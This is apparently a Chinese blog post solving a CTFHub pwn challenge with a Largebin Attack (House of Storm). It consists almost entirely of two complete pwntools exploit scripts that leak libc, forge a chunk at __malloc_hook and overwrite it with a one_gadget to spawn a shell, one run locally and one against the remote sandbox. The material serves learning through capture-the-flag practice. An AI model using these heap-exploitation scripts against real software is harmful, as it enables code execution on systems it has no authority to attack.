CTFHUB[技能树]---Largebin Attack(House of storm)

已于 2023-02-07 11:56:21 修改
阅读量138 收藏
点赞数 2
分类专栏: PWN 网络安全 文章标签: linux 安全 运维
于 2023-02-07 11:03:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KaliLinux_V/article/details/128915137
版权

这题one_gadget打不了,本地能打成功,远程试遍了都不行,所以要改栈帧

本地的exp

在这里插入图片描述

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./house_of_storm"
#io = remote("challenge-aa33f598e4074e46.sandbox.ctfhub.com",25540)
io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23.so")

s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           :io.recv(num)
ru      = lambda delims		    :io.recvuntil(delims)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))


def add(idx,size):
	ru(b"choice: \n")
	sl(b"1")
	ru(b"idx:")
	sl(str(idx))
	ru(b"size:")
	sl(str(size))

def free(idx):
	ru(b"choice: \n")
	sl(b"2")
	ru(b"idx:")
	sl(str(idx))


def edit(idx,data):
	ru(b"choice: \n")
	sl(b"3")
	ru(b"idx:")
	sl(str(idx))
	ru(b"content:")
	s(data)


def show(idx):
	ru(b"choice: \n")
	sl(b"4")
	ru(b"idx:")
	sl(str(idx))


def back(data):
	ru(b"choice: \n")
	sl(b"5")
	s(data)


add(0,0x440)
add(1,0x450)
add(2,0x430)
add(3,0x450)
free(2)
free(0)

add(4,0x440)
free(4)
show(4)

ru(b"\n")
main_arena = uu64(r(6))
libc_base = main_arena-88-0x10-libc.sym['__malloc_hook']
malloc_hook = libc_base+libc.sym['__malloc_hook']
fake_chunk = malloc_hook-0x20
gadget = [0x45206,0x4525a,0xef9f4,0xf0897]
one_gadget = gadget[2]+libc_base
print("main_arena------------>: ",hex(main_arena))
print("libc_base-------------->: ",hex(libc_base))
print("fake_chunk------------->: ",hex(fake_chunk))

edit(0,p64(0)+p64(fake_chunk))
edit(2,p64(0)+p64(fake_chunk+8)+p64(0)+p64(fake_chunk-0x18-5))

back(p64(0)*2+p64(one_gadget))
add(5,0x450)

itr()

这是远程的exp要改栈帧

from pwn import *
from LibcSearcher import *

context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./house_of_storm"
io = remote("challenge-aa33f598e4074e46.sandbox.ctfhub.com",25540)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23.so")

s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           :io.recv(num)
ru      = lambda delims		    :io.recvuntil(delims)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))


def add(idx,size):
	ru(b"choice: \n")
	sl(b"1")
	ru(b"idx:")
	sl(str(idx))
	ru(b"size:")
	sl(str(size))

def free(idx):
	ru(b"choice: \n")
	sl(b"2")
	ru(b"idx:")
	sl(str(idx))


def edit(idx,data):
	ru(b"choice: \n")
	sl(b"3")
	ru(b"idx:")
	sl(str(idx))
	ru(b"content:")
	s(data)


def show(idx):
	ru(b"choice: \n")
	sl(b"4")
	ru(b"idx:")
	sl(str(idx))


def back(data):
	ru(b"choice: \n")
	sl(b"5")
	s(data)


add(0,0x440)
add(1,0x450)
add(2,0x430)
add(3,0x450)
free(2)
free(0)

add(4,0x440)
free(4)
show(4)

ru(b"\n")
main_arena = uu64(r(6))
libc_base = main_arena-88-0x10-libc.sym['__malloc_hook']
malloc_hook = libc_base+libc.sym['__malloc_hook']
realloc_hook = libc_base+libc.sym["realloc"]
fake_chunk = malloc_hook-0x20
gadget = [0x45216,0x4526a,0xf02a4,0xf1147]
one_gadget = gadget[3]+libc_base
print("main_arena------------>: ",hex(main_arena))
print("libc_base-------------->: ",hex(libc_base))
print("realloc_hook------------>: ",hex(realloc_hook))
print("fake_chunk------------->: ",hex(fake_chunk))

edit(0,p64(0)+p64(fake_chunk))
edit(2,p64(0)+p64(fake_chunk+8)+p64(0)+p64(fake_chunk-0x18-5))

back(p64(0)*1+p64(one_gadget)+p64(realloc_hook+8))
add(5,0x430)

itr()
saulgoodman-q
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfhub技能_web_web前置技能_HTTP
YanLucyqi的博客
11-28 1911
POST请求可能会导致新的资源的建立和/或已有资源的修改。重定向的返回码3XX说明。(7)点击Repeater,修改target(其中Host为网址的ip地址,Port为网址的端口号),并将内容粘贴进Request的Raw去。(7)点击Repeater,修改target(其中Host为网址的ip地址,Port为网址的端口号),并将内容粘贴进Request的Raw去。(7)点击Repeater,修改target(其中Host为网址的ip地址,Port为网址的端口号),并将内容粘贴进Request的Raw去。
CTFHub技能
weixin_59480274的博客
04-23 4774
文章目录一、CTF基础知识1、CTF简介2、竞赛二、使用步骤1.引入库2.读入数据总结 一、CTF基础知识 1、CTF简介 开启题目 2、竞赛 开启题目 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ignore') import ss
CTFHUB-WEB-SQL注入-布尔盲注
weixin_43486981的博客
08-10 1467
知识点: Burp suite爆破模块intruder的设置: Positions设置 attack type:攻击模式设置 sniper:对变量依次进行破解。多个标记依次进行。单参数爆破,多参数时同一个字典按顺序替换各参数,总之初始值有一个参数不变。 battering ram:对变量同时进行破解。多个标记同时进行。多参数同时爆破,但用的是同一个字典。 pitchfork:每一个变量标记对应一个字典,取每个字典的对应项。 多参数同时爆破,但用的是不同的字典。 cluster bomb:每个变量对应一个字
好好说话之Large Bin Attack
hollk’s blog
01-20 4506
large bin attack这种方法本质上并不难,只是有点绕而已。他和上一篇unsorted bin attack有点类似,都是chunk挂进bin链表的时候通过完成链表结构连接时发生的问题,只不过large chunk还需要考虑fd_nextsize和bk_nextsize这两个结构。接下来就剩Tcache attackHouse系列啦!终于要熬出头了???? 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
CTFHub技能——备份文件下载
weixin_59480274的博客
04-18 3827
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录一、网站源码1. 开启题目2. 进入环境3.下载Burp,利用Burp对网站源码进行破解二、bak文件三、vim缓存四、.DS_Store 一、网站源码 1. 开启题目 2. 进入环境 通过下方链接进入环境 查看题目要求 3.下载Burp,利用Burp对网站源码进行破解 进入burp 点击Proxy 点击Intercept is on显蓝色 再双击下方显橙红色Open browser 进入页面 如图所示 点击右上角.
CTFHub技能之密码口令
qq_64948897的博客
08-07 2272
ctfhub技能--web--密码口令(新手入门教程)
CTF-PWN学习-为缺少指导的同学而生
热门推荐
yuwoxinanA3的博客
05-11 1万+
入门PWN不可能无痛,但尽量会减轻大家的痛苦,怎么说呢,就像博主在你们前面一步的位置,帮你们挡着一点风浪前进。
CTFHub技能笔记之SSRF:内网访问、伪协议读取文件、端口扫描
weixin_48799157的博客
03-31 7626
小白一个,记录解题过程,如有错误请指正! 补充知识点: 1.什么是SSRF SSRF(Server-Side Request Forgery:服务器跨站请求),是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内网。也就是说可以利用一个网络请求的服务,当作跳板进行攻击) 2.SSRF产生的原因 SSRF 形成的原因往往是由于服务端提供了从其他服务器应用...
CTF pwn题堆入门 -- Large bin
lifanxin的博客
04-07 1802
Large bin概述攻击方式分配堆到目的地址house of force总结 概述   large bin采用双链表结构,libc-2.23版本下64位机器上,最小为0x400(1024字节),里面的chunk从头结点的fd指针开始,按大小顺序排列。不同于fast bin, small bin, unsorted bin的结构,当属于large bin的chunk被释放时,chunk中还会有fd_nextsize和bk_nextsize指针,分别指向前后第一个与本身chunk大小不同的chunk。当然也就
Largebin Attack原理详解
qq_41252520的博客
08-07 1436
攻击成效:能够向任意地址写堆地址,常配合其他攻击手法实现getshell。条件:能够修改Largebin−>bkLargebin−>bk。研究环境:Glibc2.31\textcolor{green}{研究环境:Glibc2.31}研究环境:Glibc2.31现在总结一下Largebin attack的一些利用条件和步骤。能够修改Largebin中的块的字段。程序中至少能够分配三种属于Largebin的不同大小的块。分配一块大小。...
auditd-attack:映射到MITRE的Attack FrameworkLinux Auditd规则集
02-04
"auditd-attack" 是一个针对Linux操作系统的审计工具,它与MITRE的Attack Framework紧密结合,提供了强大的安全监控能力。MITRE的Attack Framework是一个广泛认可的资源,用于理解和应对网络安全威胁,它详细列出了...
shiro_attack-2.2.jar
12-17
shiro_attack-2.2.jar
ctf-gameserver:FAUST Gameserver,用于防御攻击的CTF
05-06
CTF游戏服务器这是用于。 它最初是为编写的,但可重复用于其他比赛。包含什么游戏服务器包含多个组件。 它们可能彼此分开部署,因为它们唯一的通信手段是共享数据库。 Web:基于的Web应用程序,用于团队注册和记分板...
Secure-Systems-of-SQL-Injection-Attack:具有SQL注入漏洞的安全系统
05-01
具有SQL注入漏洞的安全系统 抽象的 Web应用程序带来了新型的计算机安全漏洞,例如SQL注入。 这是一类基于输入验证的漏洞。 SQL注入的典型用法是从数据库泄漏机密信息,绕过身份验证逻辑或向数据库中添加未经授权的...
Distributed-dictionary-attack
05-09
Distributed-dictionary-attack是一个Java程序,它使用增量禁止系统实现易受攻击的服务器。 在该项目中,有一些通过RabbitMQ中间件进行通信的客户端。 客户端之间交换的消息是错误的密码。 你需要什么 - - -
Linux -软件安装
z2331198564653的博客
07-18 872
项目开发好需要部署,而项目本身可能依赖其他软件。这时在部署项目时就需要安装依赖的软件。比如: jdk mysql tomcat redis rabbitmq es等。
Linux中的环境变量
qhy850716的博客
07-17 561
我们思考这样一个问题:指令也是可执行程序,我们写好的编译好的c语言也是程序,为什么我们在执行c语言程序时要./a.out带上当前路径,而ls这种指令就不要带路径呢?这就是环境变量PATH的作用,Linux中存在一些全局设置,表明命令行解释器应该去哪个路径下寻找可执行程序。系统中的很多配置在我们登录Linux时就已经被加载到bash中了,也就是内存。
linux学习笔记整理: 关于linux:Shell脚本 2024/7/20;
最新发布
gzx233的博客
07-20 851
Shell脚本的使用
【Linux服务器Java环境搭建】010在linux中安装Redis,以及对Redis的配置与远程连接
liuzhenhe1988的专栏
07-19 962
好久没有更新博客了,今天下了班回到家,看到电脑桌上尘封已久的《Spring Boot应用开发实战》,翻开目录想起来之前写的系列【Linux服务器Java环境搭建】还未完结,那就继续吧,今天主要是按linux服务器中安装和配置redis。本系列其他文章,请查看系列【Linux服务器Java环境搭建】
Cross-Site Request Forgery (CSRF) Attack Lab
09-04
Cross-Site Request Forgery (CSRF) Attack Lab是一个网络安全实验,旨在测试和演示跨站请求伪造攻击(CSRF)的原理和实践。实验中通过创建恶意网页和利用漏洞,攻击者可以伪造用户身份进行各种未经授权的操作,如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值